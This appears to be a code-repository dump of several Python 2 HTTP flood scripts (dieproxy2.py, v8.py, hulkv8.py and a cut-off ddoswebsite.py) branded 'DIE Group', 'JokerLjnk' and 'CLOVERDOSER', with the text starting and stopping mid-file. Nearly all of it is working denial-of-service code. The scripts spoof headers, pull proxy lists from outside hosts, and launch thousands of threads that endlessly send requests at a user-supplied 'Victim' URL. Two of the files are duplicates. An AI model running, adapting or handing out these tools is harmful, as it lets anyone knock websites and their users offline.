"http://www.evidence.nhs.uk/search?q=", 103 | "http://www.shodanhq.com/search?q="] 104 | 105 | keyWords = [ 106 | "sex", 107 | "World Cup", 108 | "singer", 109 | "ISIS", 110 | "facebook", 111 | "anonymous"] 112 | 113 | def randomIp(): 114 | random.seed() 115 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 116 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 117 | return result 118 | 119 | def randomIpList(): 120 | random.seed() 121 | res = "" 122 | for ip in xrange(random.randint(2, 8)): 123 | res = res + randomIp() + ", " 124 | return res[0:len(res) - 2] 125 | 126 | def randomReFerer(): 127 | return random.choice(reFerers) 128 | 129 | def randomKeyWord(): 130 | return random.choice(keyWords) 131 | 132 | class attacco(threading.Thread): 133 | def run(self): 134 | current = x 135 | 136 | if current < len(listaproxy): 137 | proxy = listaproxy[current].split(':') 138 | else: 139 | proxy = random.choice(listaproxy).split(':') 140 | 141 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 142 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 143 | referer = "Referer: "+ randomReFerer() + randomKeyWord() + "\r\n" 144 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 145 | 146 | while nload: 147 | time.sleep(1) 148 | 149 | while 1: 150 | try: 151 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 152 | a.connect((proxy[0], int(proxy[1]))) 153 | a.send(httprequest) 154 | try: 155 | for i in xrange(3): 156 | a.send(httprequest) 157 | except: 158 | tts = 1 159 | 160 | 161 | except: 162 | proxy = random.choice(listaproxy).split(':') 163 | 164 | 165 | 166 | #Main 167 | print(" .----. KitHulk - DIE Group .----. ") 168 | print("------(.:. Ddos/Dos With Proxy List. Using: kithulk http://victim number_thread Ex: kithulk http://google.com 1000.:.)------") 169 | 170 | # Site 171 | url = sys.argv[1] 172 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 173 | 174 | #Proxy 175 | proxyf = urllib.urlopen("http://ddosvn.somee.com/listproxy.txt").read() 176 | listaproxy = proxyf.split('\n') 177 | 178 | #So luong 179 | thread = sys.argv[2] 180 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 181 | accept = "Accept-Encoding: gzip, deflate\r\n" 182 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 183 | nload = 1 184 | x = 0 185 | 186 | for x in xrange(int(thread)): 187 | attacco().start() 188 | time.sleep(0.003) 189 | print "Dang chuan bi luong Ddos " + str(x) + "!" 190 | print "Dang Bat Dau Tan Cong..." 191 | nload = 0 192 | while not nload: 193 | time.sleep(1) -------------------------------------------------------------------------------- /dieproxy2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf-8 3 | #coder by KitHulk (DIE Group) 4 | import sys 5 | import random 6 | import socket 7 | import threading 8 | import time 9 | import datetime 10 | import urllib 11 | #GET USER-AGENT 12 | def getUserAgent(): 13 | platform = random.choice(['Macintosh', 'Windows', 'X11']) 14 | if platform == 'Macintosh': 15 | os = random.choice(['68K', 'PPC']) 16 | elif platform == 'Windows': 17 | os = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE', 'Windows 7', 'Windows 8']) 18 | elif platform == 'X11': 19 | os = random.choice(['Linux i686', 'Linux x86_64']) 20 | browser = random.choice(['chrome', 'firefox', 'ie']) 21 | if browser == 'chrome': 22 | webkit = str(random.randint(500, 599)) 23 | version = str(random.randint(0, 28)) + '.0' + str(random.randint(0, 1500)) + '.' + str(random.randint(0, 999)) 24 | return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit 25 | elif browser == 'firefox': 26 | currentYear = datetime.date.today().year 27 | year = str(random.randint(2000, currentYear)) 28 | month = random.randint(1, 12) 29 | if month < 10: 30 | month = '0' + str(month) 31 | else: 32 | month = str(month) 33 | day = random.randint(1, 30) 34 | if day < 10: 35 | day = '0' + str(day) 36 | else: 37 | day = str(day) 38 | gecko = year + month + day 39 | version = str(random.randint(1, 21)) + '.0' 40 | return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version 41 | elif browser == 'ie': 42 | version = str(random.randint(1, 10)) + '.0' 43 | engine = str(random.randint(1, 5)) + '.0' 44 | option = random.choice([True, False]) 45 | if option == True: 46 | token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' 47 | else: 48 | token = '' 49 | return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' 50 | 51 | reFerers = [ 52 | "https://www.google.com.vn/?gws_rd=ssl#q=", 53 | "http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..", 54 | "http://vk.com/profile.php?redirect=", 55 | "http://www.usatoday.com/search/results?q=", 56 | "http://yandex.ru/yandsearch?text=", 57 | "http://go.mail.ru/search?mail.ru=1&q=", 58 | "http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..", 59 | "http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..", 60 | "http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..", 61 | "http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..", 62 | "http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..", 63 | "http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..", 64 | "http://www.google.ru/url?sa=t&rct=?j&q=&e..", 65 | "http://help.baidu.com/searchResult?keywords=", 66 | "http://www.bing.com/search?q=", 67 | "https://www.yandex.com/yandsearch?text=", 68 | "https://duckduckgo.com/?q=", 69 | "http://www.ask.com/web?q=", 70 | "http://search.aol.com/aol/search?q=", 71 | "https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=", 72 | "http://validator.w3.org/feed/check.cgi?url=", 73 | "http://host-tracker.com/check_page/?furl=", 74 | "http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=", 75 | "http://jigsaw.w3.org/css-validator/validator?uri=", 76 | "https://add.my.yahoo.com/rss?url=", 77 | "http://engadget.search.aol.com/search?q=", 78 | "https://steamcommunity.com/market/search?q=", 79 | "http://filehippo.com/search?q=", 80 | "http://www.topsiteminecraft.com/site/pinterest.com/search?q=", 81 | "http://eu.battle.net/wow/en/search?q=", 82 | "http://engadget.search.aol.com/search?q=", 83 | "http://careers.gatesfoundation.org/search?q=", 84 | "http://techtv.mit.edu/search?q=", 85 | "http://www.ustream.tv/search?q=", 86 | "http://www.ted.com/search?q=", 87 | "http://funnymama.com/search?q=", 88 | "http://itch.io/search?q=", 89 | "http://jobs.rbs.com/jobs/search?q=", 90 | "http://taginfo.openstreetmap.org/search?q=", 91 | "http://www.baoxaydung.com.vn/news/vn/search&q=", 92 | "https://play.google.com/store/search?q=", 93 | "http://www.tceq.texas.gov/@@tceq-search?q=", 94 | "http://www.reddit.com/search?q=", 95 | "http://www.bestbuytheater.com/events/search?q=", 96 | "https://careers.carolinashealthcare.org/search?q=", 97 | "http://jobs.leidos.com/search?q=", 98 | "http://jobs.bloomberg.com/search?q=", 99 | "https://www.pinterest.com/search/?q=", 100 | "http://millercenter.org/search?q=", 101 | "https://www.npmjs.com/search?q=", 102 | "http://www.evidence.nhs.uk/search?q=", 103 | "http://www.shodanhq.com/search?q="] 104 | 105 | keyWords = [ 106 | "sex", 107 | "World Cup", 108 | "singer", 109 | "ISIS", 110 | "facebook", 111 | "anonymous"] 112 | 113 | def randomIp(): 114 | random.seed() 115 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 116 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 117 | return result 118 | 119 | def randomIpList(): 120 | random.seed() 121 | res = "" 122 | for ip in xrange(random.randint(2, 8)): 123 | res = res + randomIp() + ", " 124 | return res[0:len(res) - 2] 125 | 126 | def randomReFerer(): 127 | return random.choice(reFerers) 128 | 129 | def randomKeyWord(): 130 | return random.choice(keyWords) 131 | 132 | class attacco(threading.Thread): 133 | def run(self): 134 | current = x 135 | 136 | if current < len(listaproxy): 137 | proxy = listaproxy[current].split(':') 138 | else: 139 | proxy = random.choice(listaproxy).split(':') 140 | 141 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 142 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 143 | referer = "Referer: "+ randomReFerer() + randomKeyWord() + "\r\n" 144 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 145 | 146 | while nload: 147 | time.sleep(1) 148 | 149 | while 1: 150 | try: 151 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 152 | a.connect((proxy[0], int(proxy[1]))) 153 | a.send(httprequest) 154 | try: 155 | for i in xrange(3): 156 | a.send(httprequest) 157 | except: 158 | tts = 1 159 | 160 | 161 | except: 162 | proxy = random.choice(listaproxy).split(':') 163 | 164 | 165 | 166 | #Main 167 | print(" .----. KitHulk - DIE Group .----. ") 168 | print("------(.:. Ddos/Dos With Proxy List. Using: kithulk http://victim number_thread Ex: kithulk http://google.com 1000.:.)------") 169 | 170 | # Site 171 | url = sys.argv[1] 172 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 173 | 174 | #Proxy 175 | proxyf = urllib.urlopen("http://123.30.209.165/proxy.txt").read() 176 | listaproxy = proxyf.split('\n') 177 | 178 | #So luong 179 | thread = sys.argv[2] 180 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 181 | accept = "Accept-Encoding: gzip, deflate\r\n" 182 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 183 | nload = 1 184 | x = 0 185 | 186 | for x in xrange(int(thread)): 187 | attacco().start() 188 | time.sleep(0.003) 189 | print "Dang chuan bi luong Ddos " + str(x) + "!" 190 | print "Dang Bat Dau Tan Cong..." 191 | nload = 0 192 | while not nload: 193 | time.sleep(1) -------------------------------------------------------------------------------- /v8.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf-8 3 | #..:: > DIE_v8 < ::.. Mod By JokerLjnk 4 | 5 | import random 6 | import socket 7 | import threading 8 | import time 9 | import datetime 10 | import urllib2 11 | import urllib 12 | import re 13 | import sys 14 | import optparse 15 | import os 16 | import urlparse 17 | 18 | #Hulk Mod By JokerLjnk 19 | url='' 20 | host='' 21 | headers_useragents=[] 22 | headers_referers=[] 23 | keyword_top=[] 24 | request_counter=0 25 | flag=0 26 | safe=0 27 | def inc_counter(): 28 | global request_counter 29 | request_counter+=1 30 | 31 | def set_flag(val): 32 | global flag 33 | flag=val 34 | 35 | def set_safe(): 36 | global safe 37 | safe=1 38 | 39 | def getUserAgent(): 40 | platform = random.choice(['Macintosh', 'Windows', 'X11']) 41 | if platform == 'Macintosh': 42 | os = random.choice(['68K', 'PPC']) 43 | elif platform == 'Windows': 44 | os = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE', 'Windows 7', 'Windows 8']) 45 | elif platform == 'X11': 46 | os = random.choice(['Linux i686', 'Linux x86_64']) 47 | browser = random.choice(['chrome', 'firefox', 'ie']) 48 | if browser == 'chrome': 49 | webkit = str(random.randint(500, 599)) 50 | version = str(random.randint(0, 28)) + '.0' + str(random.randint(0, 1500)) + '.' + str(random.randint(0, 999)) 51 | return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit 52 | elif browser == 'firefox': 53 | currentYear = datetime.date.today().year 54 | year = str(random.randint(2000, currentYear)) 55 | month = random.randint(1, 12) 56 | if month < 10: 57 | month = '0' + str(month) 58 | else: 59 | month = str(month) 60 | day = random.randint(1, 30) 61 | if day < 10: 62 | day = '0' + str(day) 63 | else: 64 | day = str(day) 65 | gecko = year + month + day 66 | version = str(random.randint(1, 21)) + '.0' 67 | return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version 68 | elif browser == 'ie': 69 | version = str(random.randint(1, 10)) + '.0' 70 | engine = str(random.randint(1, 5)) + '.0' 71 | option = random.choice([True, False]) 72 | if option == True: 73 | token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' 74 | else: 75 | token = '' 76 | return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' 77 | 78 | def referer_list(): 79 | global headers_referers 80 | headers_referers.append('https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=') 81 | headers_referers.append('http://www.google.com/?q=') 82 | headers_referers.append('https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=') 83 | headers_referers.append('https://drive.google.com/viewerng/viewer?url=') 84 | headers_referers.append('http://www.google.com/translate?u=') 85 | headers_referers.append('https://developers.google.com/speed/pagespeed/insights/?url=') 86 | headers_referers.append('http://help.baidu.com/searchResult?keywords=') 87 | headers_referers.append('http://www.bing.com/search?q=') 88 | headers_referers.append('https://add.my.yahoo.com/rss?url=') 89 | headers_referers.append('https://play.google.com/store/search?q=') 90 | return(headers_referers) 91 | 92 | def keyword_list(): 93 | global keyword_top 94 | keyword_top.append('Sex') 95 | keyword_top.append('Robin Williams') 96 | keyword_top.append('World Cup') 97 | keyword_top.append('Ca Si Le Roi') 98 | keyword_top.append('Ebola') 99 | keyword_top.append('Malaysia Airlines Flight 370') 100 | keyword_top.append('ALS Ice Bucket Challenge') 101 | keyword_top.append('Flappy Bird') 102 | keyword_top.append('Conchita Wurst') 103 | keyword_top.append('ISIS') 104 | keyword_top.append('Frozen') 105 | keyword_top.append('014 Sochi Winter Olympics') 106 | keyword_top.append('IPhone') 107 | keyword_top.append('Samsung Galaxy S5') 108 | keyword_top.append('Nexus 6') 109 | keyword_top.append('Moto G') 110 | keyword_top.append('Samsung Note 4') 111 | keyword_top.append('LG G3') 112 | keyword_top.append('Xbox One') 113 | keyword_top.append('Apple Watch') 114 | keyword_top.append('Nokia X') 115 | keyword_top.append('Ipad Air') 116 | keyword_top.append('Facebook') 117 | keyword_top.append('Anonymous') 118 | return(keyword_top) 119 | 120 | def buildblock(size): 121 | out_str = '' 122 | for i in range(0, size): 123 | a = random.randint(65, 90) 124 | out_str += chr(a) 125 | return(out_str) 126 | 127 | def httpcall(url): 128 | referer_list() 129 | code=0 130 | if url.count("?")>0: 131 | param_joiner = "&" 132 | else: 133 | param_joiner = "?" 134 | request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) 135 | request.add_header('User-Agent', getUserAgent()) 136 | request.add_header('Cache-Control', 'no-cache') 137 | request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') 138 | request.add_header('Referer', random.choice(headers_referers) + host + buildblock(random.randint(5,10))) 139 | request.add_header('Keep-Alive', random.randint(110,120)) 140 | request.add_header('Connection', 'keep-alive') 141 | request.add_header('Host',host) 142 | 143 | index = random.randint(0,len(listaproxy)-1) 144 | proxy = urllib2.ProxyHandler({'http':listaproxy[index]}) 145 | opener = urllib2.build_opener(proxy,urllib2.HTTPHandler) 146 | urllib2.install_opener(opener) 147 | try: 148 | urllib2.urlopen(request) 149 | if(flag==1): set_flag(0) 150 | if(code==500): code=0 151 | except urllib2.HTTPError, e: 152 | set_flag(1) 153 | code=500 154 | time.sleep(60) 155 | except urllib2.URLError, e: 156 | sys.exit() 157 | else: 158 | inc_counter() 159 | urllib2.urlopen(request) 160 | return(code) 161 | 162 | class HTTPThread(threading.Thread): 163 | def run(self): 164 | try: 165 | while flag<2: 166 | code=httpcall(url) 167 | if (code==500) & (safe==1): 168 | set_flag(2) 169 | except Exception, ex: 170 | pass 171 | 172 | class MonitorThread(threading.Thread): 173 | def run(self): 174 | previous=request_counter 175 | while flag==0: 176 | if (previous+100request_counter): 177 | previous=request_counter 178 | if flag==2: 179 | print '' 180 | 181 | #DIE_v8 Mod By JokerLjnk 182 | def randomIp(): 183 | random.seed() 184 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 185 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 186 | return result 187 | 188 | def randomIpList(): 189 | random.seed() 190 | res = "" 191 | for ip in xrange(random.randint(8, 10)): 192 | res = res + randomIp() + ", " 193 | return res[0:len(res) - 2] 194 | class attacco(threading.Thread): 195 | def run(self): 196 | referer_list() 197 | current = x 198 | 199 | if current < len(listaproxy): 200 | proxy = listaproxy[current].split(':') 201 | else: 202 | proxy = random.choice(listaproxy).split(':') 203 | 204 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 205 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 206 | referer = "Referer: "+ random.choice(headers_referers) + url + "?r="+ str(random.randint(1, 1500)) + "\r\n" 207 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 208 | 209 | while nload: 210 | time.sleep(1) 211 | pass 212 | 213 | while 1: 214 | try: 215 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 216 | a.connect((proxy[0], int(proxy[1]))) 217 | a.send(httprequest) 218 | try: 219 | for i in xrange(4): 220 | a.send(httprequest) 221 | except: 222 | tts = 1 223 | 224 | 225 | except: 226 | proxy = random.choice(listaproxy).split(':') 227 | 228 | #Main 229 | print '\n\t..:: > Code By JokerLjnk < ::..' 230 | print '\t ==> #~~ Super DDOS ~~# <== ' 231 | # Site 232 | url = raw_input("Victim: ") 233 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 234 | #Proxy 235 | in_file = open(raw_input("File proxy: "),"r") 236 | proxyf = in_file.read() 237 | 238 | 239 | in_file.close() 240 | listaproxy = proxyf.split('\n') 241 | #So luong 242 | thread = input("So luong (3000): ") 243 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 244 | accept = "Accept-Encoding: gzip, deflate\r\n" 245 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 246 | nload = 1 247 | x = 0 248 | print("\tDIE_v8 DDOS Mod By JokerLjnk") 249 | if url.count("/")==2: 250 | url = url + "/" 251 | m = re.search('http\://([^/]*)/?.*', url) 252 | host = m.group(1) 253 | for x in xrange(int(thread + 1)): 254 | attacco().start() 255 | time.sleep(0.003) 256 | print "Attacking ==========================>>" 257 | for x in xrange(501): 258 | t = HTTPThread() 259 | t.start() 260 | t = MonitorThread() 261 | t.start() 262 | nload = 0 263 | while not nload: 264 | time.sleep(1) -------------------------------------------------------------------------------- /hulkv8.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf-8 3 | #..:: > DIE_v8 < ::.. Mod By JokerLjnk 4 | 5 | import random 6 | import socket 7 | import threading 8 | import time 9 | import datetime 10 | import urllib2 11 | import urllib 12 | import re 13 | import sys 14 | import optparse 15 | import os 16 | import urlparse 17 | 18 | #Hulk Mod By JokerLjnk 19 | url='' 20 | host='' 21 | headers_useragents=[] 22 | headers_referers=[] 23 | keyword_top=[] 24 | request_counter=0 25 | flag=0 26 | safe=0 27 | def inc_counter(): 28 | global request_counter 29 | request_counter+=1 30 | 31 | def set_flag(val): 32 | global flag 33 | flag=val 34 | 35 | def set_safe(): 36 | global safe 37 | safe=1 38 | 39 | def getUserAgent(): 40 | platform = random.choice(['Macintosh', 'Windows', 'X11']) 41 | if platform == 'Macintosh': 42 | os = random.choice(['68K', 'PPC']) 43 | elif platform == 'Windows': 44 | os = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE', 'Windows 7', 'Windows 8']) 45 | elif platform == 'X11': 46 | os = random.choice(['Linux i686', 'Linux x86_64']) 47 | browser = random.choice(['chrome', 'firefox', 'ie']) 48 | if browser == 'chrome': 49 | webkit = str(random.randint(500, 599)) 50 | version = str(random.randint(0, 28)) + '.0' + str(random.randint(0, 1500)) + '.' + str(random.randint(0, 999)) 51 | return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit 52 | elif browser == 'firefox': 53 | currentYear = datetime.date.today().year 54 | year = str(random.randint(2000, currentYear)) 55 | month = random.randint(1, 12) 56 | if month < 10: 57 | month = '0' + str(month) 58 | else: 59 | month = str(month) 60 | day = random.randint(1, 30) 61 | if day < 10: 62 | day = '0' + str(day) 63 | else: 64 | day = str(day) 65 | gecko = year + month + day 66 | version = str(random.randint(1, 21)) + '.0' 67 | return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version 68 | elif browser == 'ie': 69 | version = str(random.randint(1, 10)) + '.0' 70 | engine = str(random.randint(1, 5)) + '.0' 71 | option = random.choice([True, False]) 72 | if option == True: 73 | token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' 74 | else: 75 | token = '' 76 | return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' 77 | 78 | def referer_list(): 79 | global headers_referers 80 | headers_referers.append('https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=') 81 | headers_referers.append('http://www.google.com/?q=') 82 | headers_referers.append('https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=') 83 | headers_referers.append('https://drive.google.com/viewerng/viewer?url=') 84 | headers_referers.append('http://www.google.com/translate?u=') 85 | headers_referers.append('https://developers.google.com/speed/pagespeed/insights/?url=') 86 | headers_referers.append('http://help.baidu.com/searchResult?keywords=') 87 | headers_referers.append('http://www.bing.com/search?q=') 88 | headers_referers.append('https://add.my.yahoo.com/rss?url=') 89 | headers_referers.append('https://play.google.com/store/search?q=') 90 | return(headers_referers) 91 | 92 | def keyword_list(): 93 | global keyword_top 94 | keyword_top.append('Sex') 95 | keyword_top.append('Robin Williams') 96 | keyword_top.append('World Cup') 97 | keyword_top.append('Ca Si Le Roi') 98 | keyword_top.append('Ebola') 99 | keyword_top.append('Malaysia Airlines Flight 370') 100 | keyword_top.append('ALS Ice Bucket Challenge') 101 | keyword_top.append('Flappy Bird') 102 | keyword_top.append('Conchita Wurst') 103 | keyword_top.append('ISIS') 104 | keyword_top.append('Frozen') 105 | keyword_top.append('014 Sochi Winter Olympics') 106 | keyword_top.append('IPhone') 107 | keyword_top.append('Samsung Galaxy S5') 108 | keyword_top.append('Nexus 6') 109 | keyword_top.append('Moto G') 110 | keyword_top.append('Samsung Note 4') 111 | keyword_top.append('LG G3') 112 | keyword_top.append('Xbox One') 113 | keyword_top.append('Apple Watch') 114 | keyword_top.append('Nokia X') 115 | keyword_top.append('Ipad Air') 116 | keyword_top.append('Facebook') 117 | keyword_top.append('Anonymous') 118 | return(keyword_top) 119 | 120 | def buildblock(size): 121 | out_str = '' 122 | for i in range(0, size): 123 | a = random.randint(65, 90) 124 | out_str += chr(a) 125 | return(out_str) 126 | 127 | def httpcall(url): 128 | referer_list() 129 | code=0 130 | if url.count("?")>0: 131 | param_joiner = "&" 132 | else: 133 | param_joiner = "?" 134 | request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) 135 | request.add_header('User-Agent', getUserAgent()) 136 | request.add_header('Cache-Control', 'no-cache') 137 | request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') 138 | request.add_header('Referer', random.choice(headers_referers) + host + buildblock(random.randint(5,10))) 139 | request.add_header('Keep-Alive', random.randint(110,120)) 140 | request.add_header('Connection', 'keep-alive') 141 | request.add_header('Host',host) 142 | 143 | index = random.randint(0,len(listaproxy)-1) 144 | proxy = urllib2.ProxyHandler({'http':listaproxy[index]}) 145 | opener = urllib2.build_opener(proxy,urllib2.HTTPHandler) 146 | urllib2.install_opener(opener) 147 | try: 148 | urllib2.urlopen(request) 149 | if(flag==1): set_flag(0) 150 | if(code==500): code=0 151 | except urllib2.HTTPError, e: 152 | set_flag(1) 153 | code=500 154 | time.sleep(60) 155 | except urllib2.URLError, e: 156 | sys.exit() 157 | else: 158 | inc_counter() 159 | urllib2.urlopen(request) 160 | return(code) 161 | 162 | class HTTPThread(threading.Thread): 163 | def run(self): 164 | try: 165 | while flag<2: 166 | code=httpcall(url) 167 | if (code==500) & (safe==1): 168 | set_flag(2) 169 | except Exception, ex: 170 | pass 171 | 172 | class MonitorThread(threading.Thread): 173 | def run(self): 174 | previous=request_counter 175 | while flag==0: 176 | if (previous+100request_counter): 177 | previous=request_counter 178 | if flag==2: 179 | print '' 180 | 181 | #DIE_v8 Mod By JokerLjnk 182 | def randomIp(): 183 | random.seed() 184 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 185 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 186 | return result 187 | 188 | def randomIpList(): 189 | random.seed() 190 | res = "" 191 | for ip in xrange(random.randint(8, 10)): 192 | res = res + randomIp() + ", " 193 | return res[0:len(res) - 2] 194 | class attacco(threading.Thread): 195 | def run(self): 196 | referer_list() 197 | current = x 198 | 199 | if current < len(listaproxy): 200 | proxy = listaproxy[current].split(':') 201 | else: 202 | proxy = random.choice(listaproxy).split(':') 203 | 204 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 205 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 206 | referer = "Referer: "+ random.choice(headers_referers) + url + "?r="+ str(random.randint(1, 1500)) + "\r\n" 207 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 208 | 209 | while nload: 210 | time.sleep(1) 211 | pass 212 | 213 | while 1: 214 | try: 215 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 216 | a.connect((proxy[0], int(proxy[1]))) 217 | a.send(httprequest) 218 | try: 219 | for i in xrange(4): 220 | a.send(httprequest) 221 | except: 222 | tts = 1 223 | 224 | 225 | except: 226 | proxy = random.choice(listaproxy).split(':') 227 | 228 | #Main 229 | print '\n\t..:: > Code By JokerLjnk < ::..' 230 | print '\t ==> #~~ Super DDOS ~~# <== ' 231 | # Site 232 | url = raw_input("Victim: ") 233 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 234 | #Proxy 235 | in_file = open(raw_input("File proxy: "),"r") 236 | proxyf = in_file.read() 237 | 238 | 239 | in_file.close() 240 | listaproxy = proxyf.split('\n') 241 | #So luong 242 | thread = input("So luong (3000): ") 243 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 244 | accept = "Accept-Encoding: gzip, deflate\r\n" 245 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 246 | nload = 1 247 | x = 0 248 | print("\tDIE_v8 DDOS Mod By JokerLjnk") 249 | if url.count("/")==2: 250 | url = url + "/" 251 | m = re.search('http\://([^/]*)/?.*', url) 252 | host = m.group(1) 253 | for x in xrange(int(thread + 1)): 254 | attacco().start() 255 | time.sleep(0.003) 256 | print "Attacking ==========================>>" 257 | for x in xrange(501): 258 | t = HTTPThread() 259 | t.start() 260 | t = MonitorThread() 261 | t.start() 262 | nload = 0 263 | while not nload: 264 | time.sleep(1) -------------------------------------------------------------------------------- /ddoswebsite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf-8 3 | #...:> CLOVERDOSER <:... 4 | 5 | import random 6 | import socket 7 | import threading 8 | import time 9 | import datetime 10 | import urllib2 11 | import urllib 12 | import re 13 | import sys 14 | import optparse 15 | import os 16 | import urlparse 17 | 18 | # Mod By CLOVERDOSER 19 | url='' 20 | host='' 21 | headers_useragents=[] 22 | headers_referers=[] 23 | keyword_top=[] 24 | request_counter=0 25 | flag=0 26 | safe=0 27 | def inc_counter(): 28 | global request_counter 29 | request_counter+=1 30 | 31 | def set_flag(val): 32 | global flag 33 | flag=val 34 | 35 | def set_safe(): 36 | global safe 37 | safe=1 38 | 39 | def getUserAgent(): 40 | platform = random.choice(['Macintosh', 'Windows', 'X11']) 41 | if platform == 'Macintosh': 42 | os = random.choice(['68K', 'PPC']) 43 | elif platform == 'Windows': 44 | os = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE', 'Windows 7', 'Windows 8']) 45 | elif platform == 'X11': 46 | os = random.choice(['Linux i686', 'Linux x86_64']) 47 | browser = random.choice(['chrome', 'firefox', 'ie']) 48 | if browser == 'chrome': 49 | webkit = str(random.randint(10000, 20000)) 50 | version = str(random.randint(0, 28)) + '.0' + str(random.randint(0, 50000)) + '.' + str(random.randint(0, 49999)) 51 | return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit 52 | elif browser == 'firefox': 53 | currentYear = 